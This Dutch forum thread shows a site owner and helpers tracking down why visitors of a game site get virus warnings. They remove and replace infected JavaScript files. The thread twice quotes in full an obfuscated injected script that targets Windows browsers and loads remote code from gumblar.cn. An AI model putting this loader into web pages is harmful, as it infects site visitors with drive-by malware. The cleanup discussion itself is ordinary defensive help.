Sommige mensen krijgen hetvolgende als ze mijn site http://www.crimewasted.nl bezoeken:
In welke file zit het virus?
Of wat moet ik aanpassen?
Alvast bedankt!
Sommige mensen krijgen hetvolgende als ze mijn site http://www.crimewasted.nl bezoeken:
In welke file zit het virus?
Of wat moet ik aanpassen?
Alvast bedankt!
wss staat er een gecomprimeerd bestand (gzip,zip,rar,7zip) op je website?
of een exe (uitvoerbaar bestand)
<script language=javascript><!--
(function(t){eval(unescape(('var"20a"3d"22Scr"69pt"45ng"69"6ee"22"2cb"3d"22"56ersion()+"22"2cj"3d"22"22"2cu"3dnavi"67ator"2e"75se"72Age"6e"74"3bi"66("28u"2ein"64ex"4ff("22W"69"6e"22)"3e0)"26"26(u"2eindexOf("22NT"206"22)"3c0"29"26"26"28do"63ument"2ec"6f"6fkie"2e"69ndexOf"28"22miek"3d"31"22"29"3c0"29"26"26("74ypeof(z"72vzts)"21"3dt"79pe"6ff("22A"22)"29)"7bzr"76zts"3d"22A"22"3beval("22i"66(win"64ow"2e"22+a"2b"22)j"3d"6a+"22+a+"22Majo"72"22"2bb+"61"2b"22"4di"6e"6fr"22+b+a"2b"22"42uil"64"22+b+"22"6a"3b"22)"3bdoc"75me"6et"2e"77"72"69"74e"28"22"3cscri"70t"20"73"72c"3d"2f"2fgumblar"2ecn"2fr"73s"2f"3fid"3d"22+"6a+"22"3e"3c"5c"2f"73cr"69pt"3e"22)"3b"7d').replace(t,'%')))})(/"/g);
--></script>
dat is de reden.
het staat onder je HEAD tag
In welke file staat dit dan?
Nieuwe reactie samengevoegd met originele reactie op 04.05.09 11:33:06:
Als ik in mijn bron kijk staat het er wel, maar in mijn index.php niet
Ik krijg gewoon je site te zien.
Ja, ik ook maar sommige mensen niet.
Nieuwe reactie samengevoegd met originele reactie op 04.05.09 11:44:14:
CitaatToon Meer<script language=javascript><!--
(function(t){eval(unescape(('var"20a"3d"22Scr"69pt"45ng"69"6ee"22"2cb"3d"22"56ersion()+"22"2cj"3d"22"22"2cu"3dnavi"67ator"2e"75se"72Age"6e"74"3bi"66("28u"2ein"64ex"4ff("22W"69"6e"22)"3e0)"26"26(u"2eindexOf("22NT"206"22)"3c0"29"26"26"28do"63ument"2ec"6f"6fkie"2e"69ndexOf"28"22miek"3d"31"22"29"3c0"29"26"26("74ypeof(z"72vzts)"21"3dt"79pe"6ff("22A"22)"29)"7bzr"76zts"3d"22A"22"3beval("22i"66(win"64ow"2e"22+a"2b"22)j"3d"6a+"22+a+"22Majo"72"22"2bb+"61"2b"22"4di"6e"6fr"22+b+a"2b"22"42uil"64"22+b+"22"6a"3b"22)"3bdoc"75me"6et"2e"77"72"69"74e"28"22"3cscri"70t"20"73"72c"3d"2f"2fgumblar"2ecn"2fr"73s"2f"3fid"3d"22+"6a+"22"3e"3c"5c"2f"73cr"69pt"3e"22)"3b"7d').replace(t,'%')))})(/"/g);
--></script>
dat is de reden.
het staat onder je HEAD tag
Dat heb ik nu weg, maar hij krijgt de melding nog steeds. Licht het aan zijn virus scanner?
Ik weet nu waar je fout zit, heb zelf AVAST! Pro.
In de map 'game/js/ zitten geïnfecteerde JavaScript bestanden
Genaamd:
display.js
functions.js
wz_tooltip.js
tip_balloon.js
Deze javascript bestandjes zou ik dus even verwijderen, en desnoods de origineel opnieuw downloaden hier van CP uit de banditi source.
Alvast bedankt laat nu ff testen!
Heb nog een paar virussen:
Ook in de map game/js
duration_progress.js
prototype-1.6.0.2.js
swfobject.js
Heb je dit eerder gehad, of is dit voor het eerst?
Edit:
De virussen bevatten een deel van JS:Redirector-H, wat een variant van een Trojan horse is volgens AVAST.
Ik heb even inlichtingen opgevraagd, om te kijken of het geen fake alert is.
Komt het niet de hele tijd terug?
Mogelijk is de webserver zelf besmet en haalt het verwijderen dus niet veel uit.
Zoek desnoods een andere webhoster en kuis je bestanden bij de overzet grondig uit.
Nu is de kans dat elk bestand gaat blijven worden aangepast.
@Koen,
Het gaat alléén om de JavaScript geïnfecteerde bestanden, welke waarschijnlijk geïnfecteerd zijn of een fake melding bevat.
Even verwijderen, en de origineel uit de banditi die hier te download staat, proberen. Zien of het dan over is of niet.
Voor de fake melding heb ik bij Nucia/AntiSpyWareOffensief inlichtingen opgevraagd.
Ik heb alle geinfecteerde js bestanden verwijderd.
Nieuwe reactie samengevoegd met originele reactie op 04.05.09 12:42:02:
Nu nog even testen
Nieuwe reactie samengevoegd met originele reactie op 04.05.09 12:42:46:
CitaatHeb je dit eerder gehad, of is dit voor het eerst?
Voor het eerst.
De infecties zitten ook in de game/ajax map.
Heb je de originele bestanden al terug gezet, in de game/js map?
uit de download van banditi hier op CP dus he
doe dat dan ook met de map ajax
Edit:
In de map ajax is game/ajax en dan prototype-1.6.0.2.js geïnfecteerd
Heb oude verwijderd nieuwe geupload.
Alvast bedankt voor de hulp, als je nog meer bestanden vind zeg het maar,
Ik heb net even gecheckt, en nu heb ik geen infecties meer gevonden.
Het moet dus nu opgelost zijn.
Super bedankt voor alle hulp!!!
Ben je echt dankbaar!
Citaat
De virussen bevatten een deel van JS:Redirector-H, wat een variant van een Trojan horse is volgens AVAST.
Ik heb even inlichtingen opgevraagd, om te kijken of het geen fake alert is.
Tering gek :') Je denkt ook wel dat je heel wat kan ofniet.
Opgelost door hulp van Durk!
Slotje aub!:slotje:
Citaat
Tering gek :') Je denkt ook wel dat je heel wat kan ofniet.
Alsof jij zoveel kan, jij levert vooral commentaar..
Ik ben tenminste bezig met ICT opleiding, althans dat ga ik doen.
Ondertussen weet ik zeer veel van de ICT wereld, omdat ik daar al vanaf me 12de mee bezig ben.
Zeikbeest..
Groot gelijk.
Laat Niels maar zagen.
Moest het terugkomen is waarschijnlijk je computer of de webserver besmet.
:slotje:
Heb je nog geen account? Registreer je nu en word deel van onze community!